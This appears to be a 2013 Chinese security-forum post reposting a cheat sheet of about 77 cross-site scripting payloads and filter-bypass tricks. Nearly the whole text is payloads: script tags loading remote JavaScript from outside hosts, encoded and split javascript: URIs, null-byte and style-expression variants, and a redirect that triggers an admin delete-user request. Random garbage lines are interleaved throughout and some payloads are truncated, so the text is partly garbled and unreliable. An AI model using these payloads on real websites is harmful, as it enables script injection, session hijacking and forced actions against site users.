中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
# P, F- k. o; Y% s/ m
(1)普通的XSS JavaScript注入
- Q8 _, ~4 r* [, G$ o( P6 `- P4 r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 a! H# ^: F) k1 z3 H
(2)IMG标签XSS使用JavaScript命令
! q- N! X+ b% p G) ]3 f q* C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- f# `- U3 w9 O0 ?7 W
(3)IMG标签无分号无引号
* q# m/ b3 t$ z3 j- a3 v
<IMG SRC=javascript:alert(‘XSS’)>
* Y) o+ U9 x- D) }& x
(4)IMG标签大小写不敏感
7 D/ q: ~7 S. O, N" L' W& G8 b
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; t& `9 b* N; H2 k( L u6 F
(5)HTML编码(必须有分号)
) A2 }1 N: ?! }+ |
<IMG SRC=javascript:alert(“XSS”)>
9 z; ]% F3 U5 S, o3 @$ V
(6)修正缺陷IMG标签
7 L& k! H9 _" |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 Q- ~/ R9 _3 |) W
$ M7 L ~, m8 ~
+ m5 ?2 B3 ~& c3 g
(7)formCharCode标签(计算器)
& \8 v6 q, d9 a; ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ u# I5 E( j& D
(8)UTF-8的Unicode编码(计算器)
- a% b* M; ]8 b& W( M- a- |9 e
<IMG SRC=jav..省略..S')>
* t4 \: a: [3 ?" g' I
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" K& t g6 d3 d3 R& C1 M( t
<IMG SRC=jav..省略..S')>
8 p- L$ @: H" o2 |+ K
(10)十六进制编码也是没有分号(计算器)
* B4 F2 w9 G1 f0 S) w
<IMG SRC=java..省略..XSS')>
, f, j3 Q2 J9 ?' S8 \/ z& f
(11)嵌入式标签,将Javascript分开
. h1 U" J# u7 o3 M R1 ~4 j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( l% M+ f% ?: ]! H- h
(12)嵌入式编码标签,将Javascript分开
/ I1 q8 b- M( R9 \* B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 b3 a4 {2 t7 |0 L1 X1 Z
(13)嵌入式换行符
% Y7 N: q6 ?2 X' l- t+ U
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" p# V0 `( a0 u6 M8 {; k
(14)嵌入式回车
5 E9 x! }* d7 ~0 F* ^0 k( e. |$ d- K/ v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; R1 B0 I) X! G. @0 Z5 z- G/ x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& j, W5 {2 q3 f# D- F
<IMG SRC=”javascript:alert(‘XSS‘)”>
. J& r6 [" J8 x$ l- F; n" P b
(16)解决限制字符(要求同页面)
3 n+ M+ g- [5 A- P2 P
<script>z=’document.’</script>
. r$ i: q8 P7 p m
<script>z=z+’write(“‘</script>
9 P# e8 b. X$ P* d/ h* \6 _
<script>z=z+’<script’</script>
' v5 ]3 n' |: R) w* r9 R
<script>z=z+’ src=ht’</script>
% H6 U1 {' U+ |$ P& s
<script>z=z+’tp://ww’</script>
4 G/ K+ Y2 d: o9 `" p) Q' ?- N
<script>z=z+’w.shell’</script>
6 Q2 L: e+ ]5 v5 c
<script>z=z+’.net/1.’</script>
* x) K- V+ u8 N$ M: O* u
<script>z=z+’js></sc’</script>
) F2 J* s7 w( I( E" x3 S6 C5 h
<script>z=z+’ript>”)’</script>
, w6 m# ]2 f) i. W4 r# E5 `+ G
<script>eval_r(z)</script>
6 U& g/ Q3 f, w |: d0 d
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
$ _. x5 J' ?- F. _% A: d+ n4 O
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
& Q6 n/ k( W& ?* f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 T, w5 b* {8 l8 O
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" I" \* l+ ^ f. G" t4 [$ V
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 k( e( H) o: t% z
(19)Spaces和meta前的IMG标签
0 [) z5 [3 F2 C% D4 h
<IMG SRC=” javascript:alert(‘XSS’);”>
. q9 z' v% E7 |
(20)Non-alpha-non-digit XSS
/ c0 ~: _2 X* W V& B9 ]7 I( |
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
4 m5 W. K: o7 L4 t; E
(21)Non-alpha-non-digit XSS to 2
6 t" \9 r4 m" `' U
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! `$ ?* V, {" ?" r6 q2 U: t* k
(22)Non-alpha-non-digit XSS to 3
9 X: y4 U8 k8 M5 V
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
% g% O! Z$ o. m4 w
(23)双开括号
+ m% G0 R9 N7 [& a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 R9 l# L2 b# V- e3 U/ ^; u
(24)无结束脚本标记(仅火狐等浏览器)
8 n) `! f$ v* g! v! i: ^$ h* H( m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" N8 a3 x3 n( D& j
(25)无结束脚本标记2
7 E% s* ^' H# X
<SCRIPT SRC=//3w.org/XSS/xss.js>
# Y/ U1 e6 u0 z
(26)半开的HTML/JavaScript XSS
b6 s% } i% j1 T; A9 O( j1 E9 U
<IMG SRC=”javascript:alert(‘XSS’)”
; R6 R5 x) u) S6 N
(27)双开角括号
9 A6 I7 D# X/ V/ B+ O
<iframe src=http://3w.org/XSS.html <
4 O+ s0 O. m$ Y
(28)无单引号 双引号 分号
+ Y( b' s! d! b; C- \8 e H. x
<SCRIPT>a=/XSS/
1 T2 a( d) K8 F1 o' d8 r7 f
alert(a.source)</SCRIPT>
/ a, w0 F, E' h& d/ g8 ~4 V6 {$ c/ }" k7 @
(29)换码过滤的JavaScript
1 w5 z! y2 f" Z! e ~& l+ c( P
\”;alert(‘XSS’);//
- y, r1 F: }' k' w
(30)结束Title标签
, j4 {9 z% x# x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( Q" j& R. Q; O$ v/ e
(31)Input Image
2 o6 l. Q% i/ Q5 P
<INPUT SRC=”javascript:alert(‘XSS’);”>
' [( Y9 \ x; d. @7 x {
(32)BODY Image
* u5 ^9 ^% w7 x
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ b) ~1 s2 e/ w
(33)BODY标签
, P: S, E0 t1 C5 E5 ?- `
<BODY(‘XSS’)>
, f% S& ?( L' `0 ?+ C. C
(34)IMG Dynsrc
# P) Q, q8 D! P+ X, w
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 M( ?. L- ]; q/ M
(35)IMG Lowsrc
0 B5 X9 v$ `& b3 K6 n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
& u& }+ E8 W Q0 t b8 w* g; i
(36)BGSOUND
% z6 @4 F0 ~" l/ s. F
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 g0 U; T3 L( g2 o! {) k2 g6 B/ C( r
(37)STYLE sheet
1 _: V/ i- q0 j9 S r/ p: s/ o
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 l( w& T! L9 Q4 c5 `# f$ O$ z2 _
(38)远程样式表
7 d, ]. E1 y- I" u9 |
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
: k9 u$ A3 L1 S: V h3 T7 `
(39)List-style-image(列表式)
1 w& ]) w. ?) R9 n4 i# O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" z! b0 g P; o9 v* J
(40)IMG VBscript
/ ]0 x% @: s: V0 \% C- c* d& l
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( R8 O8 q5 Y1 n
(41)META链接url
# |8 _3 ~ I1 r
4 U3 \% h1 k9 m3 J7 z4 i
( U6 F+ e- z: M1 K. j' q; Y6 @5 l% L
<META HTTP-EQUIV=”refresh” CONTENT=”0;
6 ^0 F# s1 K- R: l5 c: Q8 Z% s& L
URL=http://;URL=javascript:alert(‘XSS’);”>
9 I' ?* T5 j0 h( }, A8 ]8 e. |
(42)Iframe
* G3 P7 E+ K4 T* M, _0 A
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 a4 S: r* Y4 o2 a% T
(43)Frame
; k J9 u" i4 S/ F& U9 _
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
0 r4 l6 a' u! o: U1 s% H
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
" o- Q. \' v: F: {6 [4 h" `
(44)Table
+ h# _! Y3 B6 \# \8 W) V5 {" b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- N) ]; l7 S4 h4 z& B
(45)TD
: D' N, w' s0 f {7 A) I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 U* N3 `' ], B, J
(46)DIV background-image
2 Q# ~2 e' J2 B& A9 U' A
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" w/ @, q- t# J6 N' |
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
6 \% u" _: q/ e+ v1 j- I
8&13&12288&65279)
: R- m/ ~9 h4 ~ _& W6 I
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 K# B* J* w/ V8 k/ a( M
(48)DIV expression
& N' W6 H9 H' F: I: R
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 e7 I ~! A: y5 E1 s
(49)STYLE属性分拆表达
1 u1 P4 S5 s2 m$ X# Q0 W
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
8 L9 u: N7 D- S7 A) M! a! s3 R* b
(50)匿名STYLE(组成:开角号和一个字母开头)
: @1 H$ G) T) y% p- U, l& \
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" ]0 Y. O) k2 ?
(51)STYLE background-image
( p+ X& v( c/ y0 C) j$ ]
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
1 [/ R4 S- m' H
CLASS=XSS></A>
" e8 b1 T$ p k' z
(52)IMG STYLE方式
+ f0 D. I" y$ M% J/ a9 v
exppression(alert(“XSS”))’>
( \% ?- T: b$ v& C5 d
(53)STYLE background
' @* D; I4 n! Q: M! A
<STYLE><STYLE
8 T0 O; R7 A J* `! [* M
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& M6 D. `5 c& C2 s7 U3 e' ^
(54)BASE
( R# `* t* k# f) ~6 m9 ~. w4 `
<BASE HREF=”javascript:alert(‘XSS’);//”>
* s" S0 n9 F% p3 T! T0 {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 r) A+ d' b. r
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
5 w% B% }! r7 w/ u, i( d
(56)在flash中使用ActionScrpt可以混进你XSS的代码
% @, s- [- ^7 O4 [1 F0 S4 I
a=”get”;
5 c! O: r- A) D! U" w$ c+ H
b=”URL(\”";
5 N9 ?# u. Y E# c! ]
c=”javascript:”;
* d( i1 ?2 D! Y" J8 E( J
d=”alert(‘XSS’);\”)”;
+ [9 i0 M7 O* g) J
eval_r(a+b+c+d);
$ ?7 ~5 u& q9 W6 J0 e6 Q8 c5 b
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; y; X* J: S# s C i& t
<HTML xmlns:xss>
- [9 y- n- A1 F, |* [
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
& |5 p) G; l8 m/ F/ D
<xss:xss>XSS</xss:xss>
& ^1 B4 i8 W* J* x
</HTML>
, U3 V, `- k* X. T' T( U
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 h$ [6 }- N7 r I# j' O1 R L
<SCRIPT SRC=””></SCRIPT>
P+ i! p4 n3 D! B; ]9 M j3 ?" E3 W$ B# K
(59)IMG嵌入式命令,可执行任意命令
1 X6 O \1 R: B4 e
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
6 {7 K9 j& ?0 F! H
(60)IMG嵌入式命令(a.jpg在同服务器)
4 N. G0 ]0 ~2 ^4 V* N
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
' O2 ~& a' \ I6 P, Y- v6 ^
(61)绕符号过滤
$ X$ R: v8 f3 s4 ]- g9 J7 `
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
, r/ ^0 v; J, i
(62)
: x$ M* r% u# |0 b$ N) ]; a1 ^7 g1 S
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
6 I' P4 ~7 ^& ^- b
(63)
& F/ U7 C/ ~) d8 s$ x
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% X0 T% f8 H- u! }/ t- W
(64)
/ j: U5 x8 X5 S9 }& I
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ z+ Y$ Q5 [" d5 `# R4 |
(65)
4 S9 D" D7 e3 L3 h
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
; W& E8 D$ q7 ~& R9 ?; b1 I
(66)12-7-1 T00LS - Powered by Discuz! Board
7 \% V( U9 {* n( k6 K, e& z
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
: L' c& l5 c" E/ _* g. w; ^
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
! L! q6 s9 E1 I" p
(67)
7 P+ M- w1 X2 z" C
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
& P; F2 F% N6 l7 z; u
</SCRIPT>
0 L# q) w! z1 c5 i6 H
(68)URL绕行
5 E/ K# e ^. }( y& V
<A HREF=”
http://127.0.0.1/
”>XSS</A>
k" J4 B1 w1 b/ w
(69)URL编码
) O* T/ r; c$ j2 `: z4 c- h' u( {0 C+ O& o
<A HREF=”
http://3w.org
”>XSS</A>
# a" N1 \+ f& {2 t; Y# v; q
(70)IP十进制
& j- K+ k6 y. N: F: ^
<A HREF=”http://3232235521″>XSS</A>
, b/ t. e _! U% y1 Z* W1 f
(71)IP十六进制
2 o! |% q/ j! m- h" Q2 D
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
$ r5 @' X6 @+ P/ o
(72)IP八进制
/ g" P- R: ~* D j2 t& l# Y
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
- e" j; a7 E2 j l8 `
(73)混合编码
0 ]0 z7 J/ Q+ ?" c$ S# q s" t+ T
<A HREF=”h
3 L6 Y% q6 Q3 U+ q8 g" P; A
tt p://6 6.000146.0×7.147/”">XSS</A>
% B( @- A* M( T
(74)节省[http:]
! z' e9 W% @; g5 m" P! u' T
<A HREF=”//www.google.com/”>XSS</A>
* `1 K1 w$ P! C2 t1 F% S4 }& K G
(75)节省[www]
) ^0 N3 a* Z. p4 s* x- E9 }
<A HREF=”
http://google.com/
”>XSS</A>
' j* G8 j8 i" K5 U; n# Q
(76)绝对点绝对DNS
8 B5 `. P1 ]8 e
<A HREF=”
http://www.google.com./
”>XSS</A>
7 A+ j, X! f$ ~1 d9 E
(77)javascript链接
5 Y9 k2 X r& u& u# h; C0 m1 C
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
' H, P2 A1 ]- M3 { n5 Z) o
! {/ }* \& Q7 G3 {6 Y
原文地址:
http://fuzzexp.org/u/0day/?p=14
; |5 d# g0 q5 p2 m
4 i. m- \) @% M7 h/ F0 I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2